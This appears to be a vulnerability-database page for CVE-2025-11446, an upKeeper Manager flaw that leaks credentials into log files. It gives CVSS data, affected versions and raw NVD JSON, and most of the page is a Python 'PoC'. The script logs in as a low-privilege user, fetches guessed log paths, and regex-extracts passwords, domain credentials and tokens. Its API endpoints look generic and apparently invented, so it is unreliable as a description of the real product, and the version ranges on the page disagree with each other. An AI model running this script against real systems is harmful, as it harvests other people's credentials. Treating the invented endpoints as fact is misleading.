Security Vulnerability Report
中文
CVE-2025-11446 CVSS 6.5 MEDIUM

CVE-2025-11446

Published: 2025-11-19 09:15:48
Last Modified: 2025-12-02 20:32:51
Source: 80f39f49-2521-4ee7-9e17-af5d55e8032f

Description

Insertion of Sensitive Information into Log File vulnerability in upKeeper Solutions upKeeper Manager allows Use of Known Domain Credentials.This issue affects upKeeper Manager: from 5.2.0 before 5.2.12.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:upkeeper:upkeeper_manager:*:*:*:*:*:*:*:* - VULNERABLE
upKeeper Manager 5.2.0 <= version < 5.2.12

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-11446 PoC - upKeeper Manager Log File Information Disclosure # This PoC demonstrates the information disclosure vulnerability import requests import os import re def check_vulnerability(target_host, username, password): """ Check if the target upKeeper Manager is vulnerable to CVE-2025-11446 """ print(f"[*] Checking CVE-2025-11446 vulnerability on {target_host}") # Step 1: Authenticate with low-privilege account login_url = f"{target_host}/api/auth/login" login_data = { "username": username, "password": password } try: session = requests.Session() response = session.post(login_url, json=login_data, timeout=10) if response.status_code != 200: print("[-] Authentication failed") return False print("[+] Successfully authenticated with low-privilege account") # Step 2: Access log files log_paths = [ "/logs/upkeeper.log", "/logs/application.log", "/data/logs/upkeeper.log", "/var/log/upkeeper/upkeeper.log" ] for log_path in log_paths: log_url = f"{target_host}/api/logs{log_path}" log_response = session.get(log_url, timeout=10) if log_response.status_code == 200: print(f"[+] Found log file: {log_path}") # Step 3: Search for sensitive credentials in logs credential_patterns = [ r'password[:\s]+([^\s,}]+)', r'credential[:\s]+([^\s,}]+)', r'domain_credential[:\s]+([^\s,}]+)', r'auth_token[:\s]+([^\s,}]+)' ] for pattern in credential_patterns: matches = re.findall(pattern, log_response.text, re.IGNORECASE) if matches: print(f"[!] Potential sensitive information found: {matches}") # Step 4: Extract and report findings return { "vulnerable": True, "log_file": log_path, "credentials": matches } return {"vulnerable": False, "message": "No vulnerable log files found"} except requests.RequestException as e: print(f"[-] Error: {e}") return {"vulnerable": None, "message": str(e)} if __name__ == "__main__": target = "https://upkeeper-manager.example.com" user = "low_privilege_user" pwd = "password123" result = check_vulnerability(target, user, pwd) print(f"\n[*] Result: {result}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-11446", "sourceIdentifier": "80f39f49-2521-4ee7-9e17-af5d55e8032f", "published": "2025-11-19T09:15:48.160", "lastModified": "2025-12-02T20:32:51.367", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Insertion of Sensitive Information into Log File vulnerability in upKeeper Solutions upKeeper Manager allows Use of Known Domain Credentials.This issue affects upKeeper Manager: from 5.2.0 before 5.2.12."}], "metrics": {"cvssMetricV40": [{"source": "80f39f49-2521-4ee7-9e17-af5d55e8032f", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:H/AT:N/PR:H/UI:A/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "HIGH", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "HIGH", "subIntegrityImpact": "HIGH", "subAvailabilityImpact": "HIGH", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "80f39f49-2521-4ee7-9e17-af5d55e8032f", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-532"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:upkeeper:upkeeper_manager:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.0.0", "versionEndExcluding": "5.2.13.1", "matchCriteriaId": "E2FBA0A9-07A8-4CD2-B288-0B9D7B318283"}]}]}], "references": [{"url": "https://support.upkeeper.se/hc/en-us/articles/23693858370076-CVE-2025-11446-Insertion-of-Sensitive-Information-into-Log-File", "source": "80f39f49-2521-4ee7-9e17-af5d55e8032f", "tags": ["Vendor Advisory"]}]}}